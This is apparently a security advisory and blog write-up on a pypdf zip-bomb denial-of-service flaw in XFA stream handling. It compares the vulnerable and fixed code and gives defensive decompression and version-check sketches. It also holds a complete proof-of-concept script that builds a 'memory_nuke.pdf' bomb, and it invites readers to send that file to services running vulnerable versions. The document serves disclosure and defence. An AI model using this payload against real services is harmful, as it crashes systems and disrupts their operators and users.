Feb 26, 2026
pypdf versions prior to 6.7.3 are vulnerable to a Denial of Service attack via the `xfa` property. An attacker can craft a tiny PDF with a highly compressed stream that expands to gigabytes in memory, crashing the Python process.
A critical resource exhaustion vulnerability in the popular pypdf library allows attackers to crash applications by supplying a malicious PDF. The flaw lies in the handling of XML Forms Architecture (XFA) streams, where a 'zip bomb' technique can trigger unbounded memory allocation.
If you've been in security for more than five minutes, you know that parsing untrusted file formats is the digital equivalent of licking a subway pole. PDFs are particularly egregious offenders. They aren't just documents; they are containers for images, fonts, JavaScript, and—thanks to Adobe's enterprise legacy—XML Forms Architecture (XFA).
pypdf is the go-to pure-Python library for handling these monstrosities. It's used everywhere: from RAG (Retrieval-Augmented Generation) pipelines extracting text for LLMs, to automated invoice processing systems in fintech. It's convenient, easy to install, and usually robust.
But here's the catch: convenience often comes at the cost of safety. In CVE-2026-27888, we find a classic 'zip bomb' vulnerability hiding inside the complex structure of XFA data. An attacker can send you a PDF that looks innocent (maybe 10MB on disk), but when your Python script tries to read its metadata, it suddenly demands 10GB of RAM. The OS panics, the OOM killer wakes up, and your service goes dark. It's a beautifully simple Denial of Service.
The root cause here isn't some complex heap grooming or race condition. It's a failure of imagination regarding input validation. The vulnerability lives in `pypdf/_doc_common.py`, specifically in how the library fetches XFA data.
PDFs store XFA forms as streams. To save space, these streams are compressed, usually with `FlateDecode` (zlib). When you access `reader.xfa` or `writer.xfa`, pypdf needs to decompress that stream to give you the XML content.
Here is the logic flaw: The developers assumed that if a stream existed, it should be decompressed in its entirety into a single Python bytes object. There were no guardrails. No checks to ask, "Hey, should this 5MB compressed blob really turn into a 4GB string?"
> [!NOTE]
> In the world of data compression, high ratios are easy to achieve if the data is repetitive. A stream of a billion 'A's compresses down to almost nothing. If you blindly decompress it, you are handing the attacker a lever to exhaust your server's memory.
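
To put a number on that ratio, here is a small sketch using only the standard library `zlib` module. The 10 MiB payload size is an arbitrary choice for illustration. A single DEFLATE pass tops out at roughly 1000:1, so the printed ratio should land near that ceiling.

```python
import zlib

# 10 MiB of one repeated byte: close to the best case for DEFLATE.
payload = b"A" * (10 * 1024 * 1024)
compressed = zlib.compress(payload, level=9)

ratio = len(payload) / len(compressed)
print(f"{len(payload):,} bytes -> {len(compressed):,} bytes ({ratio:,.0f}:1)")
```

Scale the payload up and the compressed size grows in proportion, which is why a bomb that expands to a gigabyte still fits in about a megabyte.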
Let's look at the code. This is a perfect example of "it works until it doesn't." In versions prior to 6.7.3, the code looked something like this:

```python
# pypdf/_doc_common.py (Vulnerable)
if isinstance(f, IndirectObject):
    field = cast(Optional[EncodedStreamObject], f.get_object())
    if field:
        # The fatal line:
        es = zlib.decompress(field._data)
        retval[tag] = es
```

See that `zlib.decompress(field._data)`? That is a loaded gun pointed at your RAM. zlib will happily keep allocating memory until the decompression is finished or your kernel kills the process. It doesn't care that you're running on a t3.micro instance.
Now, look at the fix introduced in commit 7a4c8246ed. The maintainers introduced a wrapper that knows when to say "stop."

```python
# pypdf/_doc_common.py (Fixed)
from .filters import _decompress_with_limit  # <--- The Savior

if field:
    # Safe decompression:
    es = _decompress_with_limit(field._data)
    retval[tag] = es
```

The `_decompress_with_limit` function uses `zlib.decompressobj` to decompress in chunks, tracking the total size and raising a `LimitReachedError` if it exceeds a predefined threshold (defaulting to a sane limit like 2GB or less, configurable via `ZLIB_MAX_OUTPUT_LENGTH`).
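
For readers who want to see the shape of such a guard, here is a minimal sketch built on the standard library. It is not pypdf's implementation: `decompress_bounded`, `OutputLimitExceeded`, and the 50 MiB default are hypothetical names and values chosen for illustration. Rather than looping over chunks, it makes one capped call using the `max_length` argument of `Decompress.decompress`, which bounds the allocation in the same way.

```python
import zlib

# Hypothetical cap for illustration; not pypdf's actual default.
MAX_OUTPUT_BYTES = 50 * 1024 * 1024


class OutputLimitExceeded(Exception):
    """Raised when the decompressed output would exceed the cap."""


def decompress_bounded(data: bytes, limit: int = MAX_OUTPUT_BYTES) -> bytes:
    """Inflate `data`, refusing to produce more than `limit` bytes."""
    decompressor = zlib.decompressobj()
    # Request at most limit + 1 bytes. Receiving that extra byte proves
    # the stream is larger than allowed, without inflating the rest of it.
    output = decompressor.decompress(data, limit + 1)
    if len(output) > limit:
        raise OutputLimitExceeded(f"decompressed output exceeds {limit} bytes")
    return output
```

With this shape, a bomb costs the process at most `limit + 1` bytes of output before it is rejected, no matter how large the stream claims to be.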
Exploiting this is trivial and requires no special tools—just a few lines of Python. We are going to build a valid PDF structure that contains a malicious XFA stream.
Here is the recipe for disaster:
- Compress a large, repetitive payload using zlib with the highest compression level (9).
- Embed the result as a stream in the `/XFA` array of the PDF's `/AcroForm` dictionary.

```python
# The "I hate your RAM" PoC
import zlib

from pypdf import PdfWriter
from pypdf.generic import (
    ArrayObject,
    DictionaryObject,
    EncodedStreamObject,
    NameObject,
    TextStringObject,
)

# 1. Generate 1GB of 'A's (this consumes RAM on the attacker machine temporarily)
# In a real weaponized script, we'd stream this into the zlib compressor.
payload = b'A' * (1024 * 1024 * 1024)

# 2. Compress it. DEFLATE tops out near 1000:1, so this shrinks to roughly 1MB.
compressed_data = zlib.compress(payload, level=9)

# 3. Build the PDF structure
writer = PdfWriter()
writer.add_blank_page(width=72, height=72)

# Create the stream object
stream = EncodedStreamObject()
stream._data = compressed_data
stream[NameObject("/Filter")] = NameObject("/FlateDecode")

# Attach it to the XFA array. /XFA holds alternating (name, stream) pairs, and
# the vulnerable code only decompresses entries that are indirect references.
xfa_array = ArrayObject([TextStringObject("datasets"), writer._add_object(stream)])
acro_form = DictionaryObject()
acro_form[NameObject("/XFA")] = writer._add_object(xfa_array)
writer.root_object[NameObject("/AcroForm")] = writer._add_object(acro_form)

# 4. Save the bomb
with open("memory_nuke.pdf", "wb") as f:
    writer.write(f)
```

Now, send `memory_nuke.pdf` to any service that uses a vulnerable pypdf to inspect metadata. As soon as they access the `xfa` property... BOOM. The process hangs, memory usage spikes vertically, and the service dies.
Why is this a big deal? Because we automate everything. Modern document processing pipelines often accept uploads from the public internet (resumes, invoices, legal forms). These pipelines often run in memory-constrained environments like AWS Lambda or Kubernetes pods.
If your application uses pypdf to check for form fields (`reader.get_form_text_fields()` often interacts with XFA components internally) or simply tries to extract all metadata for indexing, a single malicious user can take down your worker nodes.
This isn't just a crash; in a shared hosting environment or a poorly isolated container, this memory pressure can affect other neighbors or lock up the host system entirely. It's a low-effort, high-impact asymmetric attack.
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U

| Product | Affected Versions | Fixed Version |
|---|---|---|
| pypdf (py-pdf) | < 6.7.3 | 6.7.3 |
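
The affected range in the table above can be checked against an environment with a few lines of standard-library Python. This is a simplified sketch: `parse_release` and `is_affected` are hypothetical helper names, and the parser only looks at the leading numeric parts of the version string, so pre-release suffixes are ignored.

```python
from importlib import metadata

FIXED_VERSION = (6, 7, 3)  # first patched release, per the table above


def parse_release(version: str) -> tuple[int, ...]:
    """Turn '6.7.3' into (6, 7, 3), dropping non-numeric suffixes like 'rc1'."""
    parts = []
    for piece in version.split(".")[:3]:
        digits = ""
        for ch in piece:
            if not ch.isdigit():
                break
            digits += ch
        parts.append(int(digits or 0))
    return tuple(parts)


def is_affected(version: str) -> bool:
    """True when the given pypdf version predates the fix."""
    return parse_release(version) < FIXED_VERSION


if __name__ == "__main__":
    try:
        installed = metadata.version("pypdf")
    except metadata.PackageNotFoundError:
        print("pypdf is not installed")
    else:
        status = "AFFECTED" if is_affected(installed) else "patched"
        print(f"pypdf {installed}: {status}")
```

Running it inside each service's virtual environment or container image is a quick way to find workers that still need the upgrade.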
| Attribute | Detail |
|---|---|
| CWE ID | CWE-400 (Uncontrolled Resource Consumption) |
| CVSS v4.0 | 6.6 (Medium) |
| Attack Vector | Network / Local |
| Exploit Status | PoC Available |
| Impact | Denial of Service (DoS) |
| Affected Component | pypdf.PdfReader.xfa |